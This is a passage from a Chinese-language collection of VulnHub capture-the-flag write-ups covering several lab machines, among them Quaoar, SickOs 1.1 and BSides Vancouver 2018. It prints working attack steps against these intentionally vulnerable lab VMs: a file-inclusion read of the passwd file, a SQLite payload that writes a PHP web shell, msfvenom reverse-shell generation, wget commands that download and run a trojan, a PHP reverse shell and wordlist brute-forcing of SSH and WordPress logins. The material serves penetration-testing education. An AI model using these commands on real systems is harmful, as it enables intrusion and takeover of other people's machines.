role="presentation" style="padding-right: 0.1px;">zico zico2215@</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h3><a name='header-n9316' class='md-header-anchor '></a>5. 文件包含漏洞</h3><p>瀏覽網站功能，發現一個鏈接爲：<a href='http://192.168.1.3/view.php?page=tools.html' target='_blank' class='url'>http://192.168.1.3/view.php?page=tools.html</a></p><p>猜想存在文件包含漏洞。通過嘗試，能夠成功包含Linux的passwd文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307882619884.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9323' class='md-header-anchor '></a>獲取Webshell</h2><h3><a name='header-n9324' class='md-header-anchor '></a>1. 嘗試經過新建數據庫getshell</h3><p>Sqlite數據庫通常應用在不少嵌入式設備當中，屬於單文件的數據庫，相似於Access數據庫。這裏嘗試新建一個名爲<code>shell.php</code>的數據庫文件，對應的會生成shell.php的一個文件。可是觀察到數據庫文件的路徑在<code>/usr/databases/test_users</code></p><p>那麼，嘗試新建一個數據庫名爲<code>../../var/www/html/shell.php</code>。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307866554332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>新建成功，可是發現過濾掉了<code>/</code>。此方法失敗，但留做記錄，算是一個突破點。</p><p> </p><h3><a name='header-n9335' class='md-header-anchor '></a>2. 嘗試導出文件getshell</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307867627327.jpg' alt='' referrerPolicy='no-referrer' /></p><p>payload:<code>ATTACH DATABASE '/var/www/html/shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();?>');</code></p><p>經過這種方式寫文件，適用於如下場景：</p><ol start='' ><li>可直接訪問數據庫執行SQL語句。</li><li>堆疊查詢選項啓用（默認關閉）</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307875215505.jpg' alt='' referrerPolicy='no-referrer' /></p><p>執行失敗，放棄這個點。</p><h3><a name='header-n9353' class='md-header-anchor '></a>3. 利用phpliteadmin和文件包含漏洞getshell</h3><p>通過前期的嘗試，發現了文件包含漏洞和數據庫權限。二者結合，便可getshell。方法以下：</p><ol start='' ><li>經過phpliteadmin新加一條數據，寫入數據庫文件。</li><li>利用文件包含漏洞包含數據庫文件getshell。</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307890668345.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307891213556.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><p> </p><h3><a name='header-n9371' class='md-header-anchor '></a>4. 種植Meterpreter shell</h3><p>首先生成一個msf的可執行木馬。</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f elf > ~/Desktop/msf.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307919687573.jpg' alt='' referrerPolicy='no-referrer' /></p><p>以後使用Python搭建一個簡單的Web Server：<code>python -m SimpleHTTPServer 80</code></p><p>以後利用前面得到的一句話，執行命令，下載生成的木馬，而且運行。</p><p>下載木馬：<code>x=system('wget http://192.168.1.4:9999/msf.elf');</code></p><p>以後<code>x=system('ls');</code> 發現並無保存，推測是由於權限問題。那麼，直接下載到<code>/tmp</code>目錄</p><p><code>x=system('wget http://192.168.1.4:9999/msf.elf -O /tmp/msf.elf');</code></p><p>查看一下：
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307925456818.jpg' alt='' referrerPolicy='no-referrer' /></p><p>以後添加執行權限而且運行。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">x=system('chmod +x /tmp/msf.elf');</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">x=system('/tmp/msf.elf');</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>結果以下：
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926464521.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><p> </p><h2><a name='header-n9401' class='md-header-anchor '></a>提高權限</h2><p>Linux提權的基本思路：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9408' class='md-header-anchor '></a>1. 使用msf提權</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>沒有發現能夠利用的提權漏洞。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307944129988.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9417' class='md-header-anchor '></a>2. 溢出提權</h3><p>如今拿到了目標靶機的Meterpreter shell，簡單的看下信息。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926898597.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現系統爲<code>Ubuntu 12.04 (Linux 3.2.0-23-generic)</code>。到<code>www.exploit-db.com</code>搜索對應的exp。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928156767.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這裏使用第二個EXP。地址爲：<code>https://www.exploit-db.com/exploits/33589/</code></p><p>使用方法：
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928690163.jpg' alt='' referrerPolicy='no-referrer' /></p><p>首先使用Meterpreter的shell把C代碼寫入：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307929385748.jpg' alt='' referrerPolicy='no-referrer' /></p><p>進入shell，使用Python spawn一個shell。
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code>。</p><p>以後編譯執行exp。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931869735.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9443' class='md-header-anchor '></a>獲取flag</h2><p>在root的家目錄發現了<code>flag.txt</code>文件：
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931748150.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9447' class='md-header-anchor '></a>靶場思路回顧</h2><p>至此，已經完成最終目標，回頭分析一下以前幾個失敗的點。</p><h3><a name='header-n9450' class='md-header-anchor '></a>1. 使用phpliteadmin寫馬失敗緣由</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307932678504.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現網站的根目錄爲<code>/var/www</code>而不是<code>/var/www/html</code>，其次<code>www</code>目錄的權限問題，不能直接寫shell。</p><p>可是<code>/var/www/</code>下的其餘目錄，權限設置的很是大，能夠直接寫shell。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307933864994.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9459' class='md-header-anchor '></a>2.再次利用phpliteadmin寫馬嘗試getshell</h3><p>在以上基礎上，咱們知道了網站的絕對路徑，且網站目錄的其餘文件夾權限設置有問題。</p><p>嘗試寫shell：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307936953989.jpg' alt='' referrerPolicy='no-referrer' /></p><p>成功寫入：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307937353945.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9472' class='md-header-anchor '></a>思路總結</h2><p>突破點總結：</p><ol start='' ><li>phpliteadmin登錄弱口令</li><li>經過phpliteadmin向數據庫文件寫入一句話木馬</li><li>利用LFI和數據庫文件getshell</li><li>MSF生成木馬，利用一句話尋找可寫目錄植入、運行</li><li>利用系統漏洞提權爲root</li></ol><p>在完成此次靶場的過程當中，能夠有不少發散的思路，好比：</p><ol start='' ><li>文件包含漏洞，可使用字典Fuzz一下各類配置文件和日誌文件。好比經過包含SSH日誌的方式getshell。</li><li>Fuzz一下網站的絕對路徑，利用phpliteadmin寫shell。</li></ol><p> </p><p>整體來講，此靶場頗有意思。既考察了Web基本的漏洞、phpliteadmin的組合利用，也考察了目錄權限設置的知識點。能夠有多種方式完成，可玩性高。</p><p> </p><h1><a name='header-n9507' class='md-header-anchor '></a>第十節 Quaoar</h1><h2><a name='header-n9508' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n9509' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/hackfest2016/Quaoar.ova' target='_blank' class='url'>https://download.vulnhub.com/hackfest2016/Quaoar.ova</a></p><h3><a name='header-n9512' class='md-header-anchor '></a>運行環境</h3><ul><li>本靶機提供了OVA格式的鏡像，官方推薦使用virtualbox，從Vulnhub下載以後，導入到viirtualbox便可運行。</li><li>靶機：修改靶機的網絡配置爲橋接模式。</li><li>攻擊機：Kali虛擬機，一樣使用橋接模式，便可訪問靶機。</li></ul><h3><a name='header-n9523' class='md-header-anchor '></a>靶機說明</h3><p>本靶機的難度爲初學者。</p><p>本靶機的滲透目標爲滲透進靶機，找到flag，並拿到root權限。</p><p>做者推薦工具<code>nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra</code></p><h2><a name='header-n9530' class='md-header-anchor '></a>信息收集</h2><ul><li><p>ip發現</p><p>首先看一下Kali的網絡配置。
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/1.JPG' alt='' referrerPolicy='no-referrer' /></p><p>靶機IP機器直接說明</p></li></ul><p>   <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/2.JPG' alt='' referrerPolicy='no-referrer' /></p><ul><li><p>端口掃描與服務識別</p><p>肯定目標IP以後，使用Nmap對目標進行更加詳細的探測：
<code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>解釋一下相關參數：</p><ul><li><code>-A</code> 詳細掃描目標IP，加載全部腳本，儘量全面的探測信息；</li><li><code>-v</code> 顯示詳細的掃描過程；</li><li><code>-oN</code> 將掃描結果以普通文本的格式輸出到<code>nmap.txt</code>。
結果以下：
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/3.JPG' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>威脅建模</p><p>分析nmap的掃描結果，發現靶機開放了<code>22</code>和<code>80</code>端口，系統爲<code>Linux</code>。<code>22</code>端口爲<code>SSH</code>服務，<code>80</code>端口爲<code>http</code>服務，Web容器爲<code>Apache/2.2.22</code>。</p><p>一般Web會存在各類各樣的問題，通過初步分析，以Web做爲初步的滲透入口。</p></li></ul><h2><a name='header-n9573' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n9575' class='md-header-anchor '></a>1. 使用dirb掃描網站目錄</h3><p><code>dirb http://172.19.0.182</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/4.JPG' alt='' referrerPolicy='no-referrer' /></p><p>發現robots.txt，upload目錄，wordpress目錄。</p><p>查看robots.txt，指向的也是wordpress目錄</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/5.JPG' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9586' class='md-header-anchor '></a>2. 弱口令</h3><p>利用wpscan進行掃描</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">wpscan -u http://172.19.0.182/wordpress --wp-content-dir wp-content --enumerate u</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating usernames ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Identified the following 2 user/s:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | Id | Login  | Name   |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | 1  | admin  | admin  |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | 2  | wpuser | wpuser |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Default first WordPress username 'admin' is still used</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Fri Jul  6 22:13:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Requests Done: 62</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 63.867 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:05</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 399px;"></div><div class="CodeMirror-gutters" style="display: none; height: 429px;"></div></div></div></pre><p> </p><p>嘗試弱口令<code>admin   admin</code>便可進入。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/6.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9599' class='md-header-anchor '></a>獲取Webshell</h2><h3><a name='header-n9600' class='md-header-anchor '></a>1. 嘗試經過修添加得到shell</h3><p><code>cp /usr/share/webshells/php/php-reverse-shell.php shelly.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/7.JPG' alt='' referrerPolicy='no-referrer' /></p><p>對shell進行修改，而後本地開NC進行監聽，訪問一個不存在的頁面，獲得shell</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/8.JPG' alt='' referrerPolicy='no-referrer' /></p><p>利用python得到一個新shell</p><p><code>`python -c 'import pty; pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/9.JPG' alt='' referrerPolicy='no-referrer' /></p><p>在該權限下，獲取第一個shell</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/10.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9622' class='md-header-anchor '></a>提高權限</h2><h3><a name='header-n9623' class='md-header-anchor '></a>1. 查看應用密碼嘗試弱口令</h3><p>查看wordpress的配置文件</p><p>發現root的帳號密碼</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/11.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><p>獲得root權限</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/12.JPG' alt='' referrerPolicy='no-referrer' /></p><p>拿到另外一個flag</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/13.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h1><a name='header-n9642' class='md-header-anchor '></a>第十一節 SickOs 1.1</h1><h2><a name='header-n9643' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n9644' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/sickos/sick0s1.1.7z' target='_blank' class='url'>https://download.vulnhub.com/sickos/sick0s1.1.7z</a></p><h3><a name='header-n9647' class='md-header-anchor '></a>運行環境</h3><ul><li>本靶機提供了OVF格式的鏡像，官方推薦使用VMware Workstation，從Vulnhub下載以後，導入到VMware Workstation便可運行。</li><li>靶機：NAT自動獲取IP。</li><li>攻擊機：NAT自動獲取IP：192.168.202.128。</li></ul><h3><a name='header-n9658' class='md-header-anchor '></a>靶機說明</h3><p>本靶機目的是拿到root權限，讀取/root/a0216ea4d51874464078c618298b1367.txt文件。</p><h2><a name='header-n9661' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>靶機所處網段是192.168.202.1/24，使用nmap掃描獲取靶機IP：192.168.202.133。
<img src='https://i.imgur.com/Sa8He6D.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口掃描與服務識別
對該IP全端口掃描以下：</li></ul><p><img src='https://i.imgur.com/J4QyA5e.png' alt='' referrerPolicy='no-referrer' /></p><p>發現使用squid代理。嘗試設置瀏覽器代理，訪問<a href='http://192.168.202.133/' target='_blank' class='url'>http://192.168.202.133/</a>：
<img src='https://i.imgur.com/TgWO3gi.png' alt='' referrerPolicy='no-referrer' />
初步獲得結果是經過掛代理對靶機IP進行漏洞挖掘。</p><h2><a name='header-n9680' class='md-header-anchor '></a>Web漏洞挖掘</h2><p>設置代理進行目錄爆破：
<img src='https://i.imgur.com/ECYErtb.png' alt='' referrerPolicy='no-referrer' /></p><p>訪問robots.txt:
<img src='https://i.imgur.com/540LyET.png' alt='' referrerPolicy='no-referrer' /></p><p>發現是wolfcms，前臺都是一些靜態頁面，無可利用點。
<img src='https://i.imgur.com/8SFGttD.png' alt='' referrerPolicy='no-referrer' /></p><p>默認地址<a href='http://192.168.202.133/wolfcms/?/admin/' target='_blank' class='url'>http://192.168.202.133/wolfcms/?/admin/</a>進入管理後臺：
<img src='https://i.imgur.com/qcutT1t.png' alt='' referrerPolicy='no-referrer' /></p><p>嘗試使用admin/admin弱口令進入後臺，從提示信息能夠看出cms版本<0.8.3.1,可能存在文件上傳漏洞：
<img src='https://i.imgur.com/9E9RE38.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9696' class='md-header-anchor '></a>獲取webshell</h2><h3><a name='header-n9697' class='md-header-anchor '></a>思路一</h3><p>後臺能夠上傳任意後綴文件，上大馬，獲取webshell:
<img src='https://i.imgur.com/jfLyKEn.png' alt='' referrerPolicy='no-referrer' /></p><p>直接讀取文件發現權限不夠，沒有回顯：
<img src='https://i.imgur.com/QfC7XrW.png' alt='' referrerPolicy='no-referrer' /></p><p>查看開放的端口，發現3306開啓，可是發現mysql版本大於5.1，沒法udf提權：
<img src='https://i.imgur.com/YIMuln3.png' alt='' referrerPolicy='no-referrer' /></p><p>利用大馬功能反彈shell：
<img src='https://i.imgur.com/fJFfkXY.png' alt='' referrerPolicy='no-referrer' />
<img src='https://i.imgur.com/YRV0vtL.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9711' class='md-header-anchor '></a>思路二</h3><p>掃描目錄時還發現了cgi-bin目錄，經過百度發現可能存在bash漏洞能夠直接getshell。利用nc反彈shell。
<img src='https://i.imgur.com/ySdDGRs.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9715' class='md-header-anchor '></a>提高權限</h2><p>嘗試使用su切換用戶或者sudo直接查看文件,發現沒權限：
<img src='https://i.imgur.com/Pr3iY30.png' alt='' referrerPolicy='no-referrer' /></p><p>進入網站部署的目錄：
<img src='https://i.imgur.com/8nWd3GZ.png' alt='' referrerPolicy='no-referrer' /></p><p>發現有配置文件，運氣好可能有存儲明文用戶密碼：
<img src='https://i.imgur.com/Q24NuxO.png' alt='' referrerPolicy='no-referrer' /></p><p>使用獲取的用戶密碼鏈接數據庫失敗，嘗試用對應密碼進行root登陸失敗。
<img src='https://i.imgur.com/qnjk8X0.png' alt='' referrerPolicy='no-referrer' /></p><p>查看系統的其餘用戶，發現sickos帳戶很特別：
<img src='https://i.imgur.com/s3vVfpI.png' alt='' referrerPolicy='no-referrer' /></p><p>用戶名：sickos，密碼：john@123登陸成功。
<img src='https://i.imgur.com/RDHnQfj.png' alt='' referrerPolicy='no-referrer' /></p><p>sudo命令查看文件：
<img src='https://i.imgur.com/remDsux.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9737' class='md-header-anchor '></a>思路總結</h2><p>1.利用文件上傳漏洞或者bash漏洞獲取系統shell。</p><p>2.部署的網站可能會存儲數據庫等明文用戶密碼，能夠加以利用。</p><h1><a name='header-n9742' class='md-header-anchor '></a>第十二節 BSides-Vancouver-2018-Workshop</h1><h2><a name='header-n9743' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n9745' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova' target='_blank' class='url'>https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova</a></p><h3><a name='header-n9748' class='md-header-anchor '></a>靶機說明</h3><p>靶機用ValualBox建立，目標是在其上得到root級訪問。</p><h3><a name='header-n9751' class='md-header-anchor '></a>目標</h3><p>Boot to root：得到root權限和Flag。</p><h3><a name='header-n9754' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機：經過ValualBox打開虛擬機，網絡鏈接方式設置爲主機模式（host-only），或者將虛擬機、Kali機都橋接到物理機的無線網卡。測試中使用VMWare導入虛機會沒法得到IP，使用ValualBox可正常得到IP。</li><li>攻擊機：同網段下有Windows攻擊機（物理機），安裝有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Hydra、Python2.七、DirBuster、AWVS、Nessus等滲透工具。一樣可以使用Kali Linux做爲攻擊機，預裝了全面的滲透工具。</li></ul><h2><a name='header-n9762' class='md-header-anchor '></a>信息收集</h2><ul><li>IP識別</li></ul><p>啓動虛擬機，使用nmap掃描C段IP <code>nmap -sP 192.168.56.0/24</code> 得到虛機IP 192.168.56.101</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口和服務識別</li></ul><p>Nmap命令：<code>nmap -p1-65535 -open -A 192.168.56.101 -oN BSides.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>彙總開放的端口和服務：</p><p>端口          服務       提示信息</p><p>21           FTP        vsftpd2.3.5 容許匿名登陸</p><p>22           ssh        OpenSSH 5.9p1</p><p>80           http       Apache httpd 2.2.22 (Ubuntu)</p><h2><a name='header-n9790' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>滲透方法一：</li><li>0x01 匿名登陸FTP得到用戶</li></ul><p>Windows下使用XFTP匿名登陸FTP：在public目錄下，找到users.txt.bk文件，用記事本打開：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到5個用戶名：abatchy，john，mai，anne，doomguy</p><ul><li>0x02 用5個用戶名加弱口令字典進行ssh暴破</li></ul><p>Windows下可以使用九頭蛇Hydra Windows版本或其餘工具暴破，這裏採用「超級弱口令檢查工具V1.0」進行暴破，線程不能開過高，不然虛機會掛，4線程。</p><p>字典的選擇，選用字典：darkweb2017-top10000.txt。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>暴破獲得用戶名：anne   密碼：princess</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 登陸ssh，具備sudo權限，得到flag </li></ul><p>使用Xshell工具ssh登陸帳號：anne 密碼：princess</p><p>執行id命令和sudo -l命令，發現anne具備sudo權限：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>執行sudo -l /root命令，sudo cat /root/flag.txt命令，得到flag：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>滲透方法二：</li><li>0x01 環境設置</li></ul><p>因須要用到Kali虛機， 須要調整將bsides虛擬機、Kali攻擊機都橋接到筆記本電腦的無線網卡，bsides虛擬機會從新得到新IP。使用Namp掃描無線網卡C段可得到bsides虛機的新IP爲：172.20.10.8，Kali虛機的IP是：172.20.10.9。</p><p>Nmap命令：<code>nmap -sP 192.168.56.0/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>一樣匿名登陸FTP，得到5個用戶名：abatchy，john，mai，anne，doomguy</p><ul><li>0x02 訪問80端口http服務</li></ul><p>訪問 <code>http://172.20.10.8/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問 <code>http://172.20.10.8/robots.txt</code> 發現/backup_wordpress目錄：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問 <code>http://172.20.10.8/backup_wordpress/</code>進入WordPress頁面：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 使用wpscan掃描WordPress，暴破後臺用戶名和密碼：</li></ul><p>(1)暴破用戶名，命令<code>wpscan -u http://172.20.10.8/backup_wordpress --enumerate u</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到用戶名：admin   john</p><p>(2)使用wpscan默認字典，暴破密碼：</p><p><code>wpscan --url wpscan -u http://172.20.10.8/backup_wordpress --wordlist /root/share/darkweb2017-top10000.txt --username john</code></p><p>暴破字典依然使用darkweb2017-top10000.txt弱口令字典：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>暴破成功，得到用戶名john 密碼enigma</p><h2><a name='header-n9883' class='md-header-anchor '></a>獲取shell</h2><ul><li>0x04 登陸並反彈shell</li></ul><p>(1)使用用戶名 john  密碼enigma登陸WordPress，登陸地址 